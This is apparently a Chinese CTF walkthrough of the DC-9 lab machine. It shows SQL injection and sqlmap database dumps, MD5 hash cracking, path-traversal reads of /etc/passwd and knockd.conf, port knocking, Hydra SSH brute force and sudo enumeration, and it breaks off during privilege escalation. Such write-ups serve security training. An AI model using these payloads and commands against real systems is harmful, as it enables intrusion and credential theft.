开靶机,net模式,启动
arp-scan -l命令扫描存活主机
nmap -sS -sV -A -n 192.168.100.22
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n 192.168.100.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-31 21:21 EST
Nmap scan report for 192.168.100.22
Host is up (0.00078s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Example.com - Staff Details - Welcome
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:21:69:DF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.78 ms 192.168.100.22
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.10 seconds
我这里使用无糖的软件直接扫
指纹扫一下80端口
kali访问一下
发现点击dispaly后会显示一些类似数据库中的信息
同样看一下search和manage
尝试在search页面进行sql注入,发现有回显
1' or 1=1 #
使用sqlmap尝试爆破
爆库
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -dbs
___
__H__
___ ___["]_____ ___ ___ {1.7.12.9#dev}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:25:47 /2024-01-31/
[20:25:47] [INFO] testing connection to the target URL
[20:25:47] [INFO] testing if the target URL content is stable
[20:25:48] [INFO] target URL content is stable
[20:25:48] [INFO] testing if POST parameter 'search' is dynamic
[20:25:48] [WARNING] POST parameter 'search' does not appear to be dynamic
[20:25:48] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[20:25:48] [INFO] testing for SQL injection on POST parameter 'search'
[20:25:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:25:48] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[20:25:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:25:48] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:25:48] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:25:48] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:25:48] [INFO] testing 'Generic inline queries'
[20:25:48] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:25:48] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:25:48] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:25:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:26:08] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
[20:26:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:26:18] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:26:18] [INFO] target URL appears to be UNION injectable with 6 columns
[20:26:18] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:26:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:26:26] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users
[20:26:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'
[*] ending @ 20:26:26 /2024-01-31/
爆表
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D users -tables
___
__H__
___ ___[']_____ ___ ___ {1.7.12.9#dev}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:27:18 /2024-01-31/
[20:27:19] [INFO] resuming back-end DBMS 'mysql'
[20:27:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:27:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:27:19] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+
[20:27:19] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'
[*] ending @ 20:27:19 /2024-01-31/
爆数据
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D users -T UserDetails -dump
___
__H__
___ ___[']_____ ___ ___ {1.7.12.9#dev}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:28:35 /2024-01-31/
[20:28:35] [INFO] resuming back-end DBMS 'mysql'
[20:28:35] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:28:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:28:35] [INFO] fetching columns for table 'UserDetails' in database 'users'
[20:28:35] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
[20:28:35] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.22/dump/users/UserDetails.csv'
[20:28:35] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'
[*] ending @ 20:28:35 /2024-01-31/
员工的账号密码
再把另一个表Staff爆一下
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D Staff -tables
___
__H__
___ ___[']_____ ___ ___ {1.7.12.9#dev}
|_ -| . [(] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:30:50 /2024-01-31/
[20:30:50] [INFO] resuming back-end DBMS 'mysql'
[20:30:50] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:30:50] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:30:50] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users |
+--------------+
[20:30:50] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'
[*] ending @ 20:30:50 /2024-01-31/
爆第一张表StaffDetails
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D Staff -T StaffDetails -dump
___
__H__
___ ___["]_____ ___ ___ {1.7.12.9#dev}
|_ -| . [)] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:32:02 /2024-01-31/
[20:32:02] [INFO] resuming back-end DBMS 'mysql'
[20:32:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:32:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:32:02] [INFO] fetching columns for table 'StaffDetails' in database 'Staff'
[20:32:02] [INFO] fetching entries for table 'StaffDetails' in database 'Staff'
Database: Staff
Table: StaffDetails
[17 entries]
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| id | email | phone | lastname | reg_date | firstname | position |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1 | marym@example.com | 46478415155456 | Moe | 2019-05-01 17:32:00 | Mary | CEO |
| 2 | julied@example.com | 46457131654 | Dooley | 2019-05-01 17:32:00 | Julie | Human Resources |
| 3 | fredf@example.com | 46415323 | Flintstone | 2019-05-01 17:32:00 | Fred | Systems Administrator |
| 4 | barneyr@example.com | 324643564 | Rubble | 2019-05-01 17:32:00 | Barney | Help Desk |
| 5 | tomc@example.com | 802438797 | Cat | 2019-05-01 17:32:00 | Tom | Driver |
| 6 | jerrym@example.com | 24342654756 | Mouse | 2019-05-01 17:32:00 | Jerry | Stores |
| 7 | wilmaf@example.com | 243457487 | Flintstone | 2019-05-01 17:32:00 | Wilma | Accounts |
| 8 | bettyr@example.com | 90239724378 | Rubble | 2019-05-01 17:32:00 | Betty | Junior Accounts |
| 9 | chandlerb@example.com | 189024789 | Bing | 2019-05-01 17:32:00 | Chandler | President - Sales |
| 10 | joeyt@example.com | 232131654 | Tribbiani | 2019-05-01 17:32:00 | Joey | Janitor |
| 11 | rachelg@example.com | 823897243978 | Green | 2019-05-01 17:32:00 | Rachel | Personal Assistant |
| 12 | rossg@example.com | 6549638203 | Geller | 2019-05-01 17:32:00 | Ross | Instructor |
| 13 | monicag@example.com | 8092432798 | Geller | 2019-05-01 17:32:00 | Monica | Marketing |
| 14 | phoebeb@example.com | 43289079824 | Buffay | 2019-05-01 17:32:02 | Phoebe | Assistant Janitor |
| 15 | scoots@example.com | 454786464 | McScoots | 2019-05-01 20:16:33 | Scooter | Resident Cat |
| 16 | janitor@example.com | 65464646479741 | Trump | 2019-12-23 03:11:39 | Donald | Replacement Janitor |
| 17 | janitor2@example.com | 47836546413 | Morrison | 2019-12-24 03:41:04 | Scott | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
[20:32:02] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.22/dump/Staff/StaffDetails.csv'
[20:32:02] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'
[*] ending @ 20:32:02 /2024-01-31/
爆第二张表Users
┌──(root㉿kali)-[~]
└─# sqlmap -u http://192.168.100.22/results.php -data "search=1" -D Staff -T Users -dump
___
__H__
___ ___[,]_____ ___ ___ {1.7.12.9#dev}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:33:02 /2024-01-31/
[20:33:03] [INFO] resuming back-end DBMS 'mysql'
[20:33:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 9832 FROM (SELECT(SLEEP(5)))GflJ) AND 'DdIQ'='DdIQ
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71706a7071,0x7a645a67786a61786f4b524447746450527065484f7a53705970706475594c4d615750726945726e,0x717a787071),NULL,NULL-- -
---
[20:33:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[20:33:03] [INFO] fetching columns for table 'Users' in database 'Staff'
[20:33:03] [INFO] fetching entries for table 'Users' in database 'Staff'
[20:33:03] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[20:33:10] [INFO] writing hashes to a temporary file '/tmp/sqlmap4b1ullqp35516/sqlmaphashes-b6219vj2.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[20:33:15] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[20:33:23] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[20:33:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[20:33:26] [INFO] starting 4 processes
[20:33:35] [INFO] using suffix '1'
[20:33:40] [INFO] cracked password 'transorbital1' for user 'admin'
Database: Staff
Table: Users
[1 entry]
+--------+--------------------------------------------------+----------+
| UserID | Password | Username |
+--------+--------------------------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin |
+--------+--------------------------------------------------+----------+
[20:33:44] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.100.22/dump/Staff/Users.csv'
[20:33:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.100.22'
[*] ending @ 20:33:44 /2024-01-31/
爆出admin和密码,盲猜md5,密码sqlmap自动解密好了
admin
transorbital1
尝试登录后台
成功
看到多了一个选项
应该是一个添加用户的界面,看见下面有一个file does not exist,猜测有文件包含漏洞,之前只做过几道ctf,了解不是很深,好在这里不难
文件包含
**前置条件:
4.8.0 <= phpMyAdmin < 4.8.2
访问`http://x.x.x.x:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd`,可见`/etc/passwd`被读取,说明文件包含漏洞存在
那尝试下呗
http://192.168.100.22/addrecord.php?file=../../../../etc/passwd
File does not exist
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash
丢给chat
这是一个Unix-like系统中的/etc/passwd文件的内容,其中包含了用户账户的信息。每一行都代表一个用户账户,提供了用户名、用户ID(UID)、组ID(GID)、主目录以及默认shell等详细信息。
以下是一些示例用户:
用户名 root,用户ID 0,组ID 0,主目录 /root,默认shell /bin/bash。
用户名 marym,用户ID 1001,组ID 1001,主目录 /home/marym,默认shell /bin/bash。
用户名 julied,用户ID 1002,组ID 1002,主目录 /home/julied,默认shell /bin/bash。
用户名 fredf,用户ID 1003,组ID 1003,主目录 /home/fredf,默认shell /bin/bash。
用户名 barneyr,用户ID 1004,组ID 1004,主目录 /home/barneyr,默认shell /bin/bash。
如果您有具体的问题或需要进行特定操作,请告诉我,我将尽力协助。
新内容:
端口保护之端口敲门
knockd服务:即敲门端口服务,该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来"敲门",,使系统开启需要访问的服务端口,才能对外访问,不使用时,再使用自定义序列号来"关门",将端口关闭,不对外监听。进一步提升了服务和系统的安全性,它的默认配置文件是:/etc/knockd.conf
依次对其进行敲门,然后就可以开启ssh服务进行连接了,所以我们可以通过文件包含来显示该配置文件的内容
File does not exist
[options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command =
/sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
[closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D
INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn
老规矩,chat
你提供了一个与使用iptables管理SSH访问的配置片段。这个配置定义了基于指定TCP标志序列的打开和关闭SSH访问的命令。
让我来解释一下提供的信息:
1. **UseSyslog [openSSH]:**
- `sequence = 7469,8475,9842`:指定了一个TCP标志序列。
- `seq_timeout = 25`:为序列设置了超时值。
- `command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT`:当检测到指定序列时执行的命令。它添加了一个规则,允许来自指定IP地址的端口22的TCP流量。
2. **[closeSSH]:**
- `sequence = 9842,8475,7469`:这是关闭序列,与打开序列的顺序相反。
- `seq_timeout = 25`:类似于打开序列,设置了超时值。
- `command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT`:执行此命令以删除规则,并拒绝来自指定IP地址的端口22的TCP流量。
3. `tcpflags = syn`:两个配置都指定了基于SYN标志的序列,SYN标志通常用于TCP三次握手。
需要注意的是,`%IP%` 占位符似乎用于表示触发序列的IP地址。在运行时,此占位符可能被实际的IP地址替换。
在部署到生产环境之前,请在受控环境中测试此配置。此外,考虑使用这种方法打开和关闭SSH访问的安全性影响。
对7469,8475,9842进行挨个敲门
nmap -p 7469 192.168.100.22
nmap -p 8475 192.168.100.22
nmap -p 9842 192.168.100.22
或者
nc 192.168.100.22 7469
nc 192.168.100.22 8475
nc 192.168.100.22 9842
┌──(root㉿kali)-[~]
└─# nc 192.168.100.22 7469
(UNKNOWN) [192.168.100.22] 7469 (?) : Connection refused
┌──(root㉿kali)-[~]
└─# nc 192.168.100.22 8475
(UNKNOWN) [192.168.100.22] 8475 (?) : Connection refused
┌──(root㉿kali)-[~]
└─# nc 192.168.100.22 9842
(UNKNOWN) [192.168.100.22] 9842 (?) : Connection refused
┌──(root㉿kali)-[~]
└─# nmap -p 22 192.168.100.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-31 21:08 EST
Nmap scan report for 192.168.100.22
Host is up (0.00014s latency).
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 00:0C:29:21:69:DF (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
可以看到22端口开放了
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n 192.168.100.22
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-31 21:23 EST
Nmap scan report for 192.168.100.22
Host is up (0.00078s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
| 256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_ 256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:21:69:DF (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.78 ms 192.168.100.22
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.11 seconds
将UserDetails中的用户名密码写入txt
使用海德拉进行爆破
参数名 参数含义
-l 指定破解的用户,对特定用户破解
-L 指定用户名字典
-p 小写,指定密码破解,少用,一般是采用密码字典
-P 大写,指定密码字典
-R 继续从上一次进度接着破解
-S 大写,采用SSL链接
-s 小写,可通过这个参数指定非默认端口
-e 可选选项,n:空密码试探,s:使用指定用户和密码试探
-t 同时运行的线程数,默认为16
-C 使用冒号分割格式,例如"登录名:密码"来代替 -L/-P 参数
-M 指定目标列表文件一行一条
-o 指定结果输出文件
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
-w 设置最大超时的时间,单位秒,默认是30s
-v / -V 显示详细过程
server 目标ip
service 指定服务名,支持的服务和协议
┌──(root㉿kali)-[~/Desktop]
└─# hydra -L users.txt -P pass.txt 192.168.100.22 ssh
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-31 21:38:13
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://192.168.100.22:22/
[22][ssh] host: 192.168.100.22 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.100.22 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.100.22 login: janitor password: Ilovepeepee
[STATUS] 285.00 tries/min, 285 tries in 00:01h, 7 to do in 00:01h, 13 active
1 of 1 target successfully completed, 3 valid passwords found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-31 21:39:19
得到三个账号密码
分别进行ssh登录查看
断开命令:logout
chandlerb
joeyt
janitor
发现有一个可以文件夹
打开看看
janitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
添加密码至passtxt重新爆破
找到一个新用户
尝试登录
对所有用户执行sudo -l后发现fredf结果不大一样
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
跳转到该目录
fredf@dc-9:/opt/devstuff/dist/test$ ls -al
total 12796
drwxr-xr-x 2 root root 4096 Dec 29 2019 .
drwxr-xr-x 3 root root 4096 Dec 29 2019 ..
-rw-r--r-- 1 root root 779676 Dec 29 2019 base_library.zip
-rwxr-xr-x 1 root root 26136 Apr 3 2019 _bz2.cpython-37m-x86_64-linux-gnu.so
